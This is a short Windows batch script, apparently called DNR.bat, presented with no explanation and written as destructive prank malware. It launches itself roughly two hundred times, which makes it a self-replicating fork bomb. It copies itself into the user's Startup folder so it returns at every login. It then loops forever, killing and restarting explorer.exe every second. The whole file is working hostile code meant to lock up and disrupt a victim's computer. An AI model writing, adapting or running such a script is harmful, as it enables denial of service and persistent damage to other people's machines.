@echo off
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
start DNR.bat
set "startupPath=%AppData%\Microsoft\Windows\Start Menu\Programs\Startup"
copy "%USERPROFILE%\Downloads\DNR.bat" "%startupPath%\DNR.bat"
goto fuckyou
:fuckyou
taskkill /f /im explorer.exe
start explorer.exe
timeout 1
goto fuckyou
